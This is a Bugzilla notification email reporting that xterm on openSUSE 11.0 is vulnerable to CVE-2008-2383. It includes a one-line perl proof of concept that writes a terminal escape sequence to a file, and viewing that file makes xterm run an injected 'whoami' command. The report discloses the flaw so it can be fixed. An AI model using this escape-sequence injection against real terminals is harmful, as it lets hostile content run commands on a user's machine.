https://bugzilla.novell.com/show_bug.cgi?id=464884 Summary: xterm vulnerable to CVE-2008-2383 Product: openSUSE 11.0 Version: Final Platform: x86-64 OS/Version: openSUSE 11.0 Status: NEW Severity: Major Priority: P5 - None Component: X11 Applications AssignedTo: bnc-team-screening@forge.provo.novell.com ReportedBy: R.Vickers@cs.rhul.ac.uk QAContact: sndirsch@novell.com Found By: --- One of my users pointed out that SuSE 11.0 has the bug recently reported in Debian Linux. A user running xterm can be induced to execute hostile commands by, for example, displaying an email message. Demonstrate with perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log cat bla.log executes whoami command. See http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 -- Configure bugmail: https://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.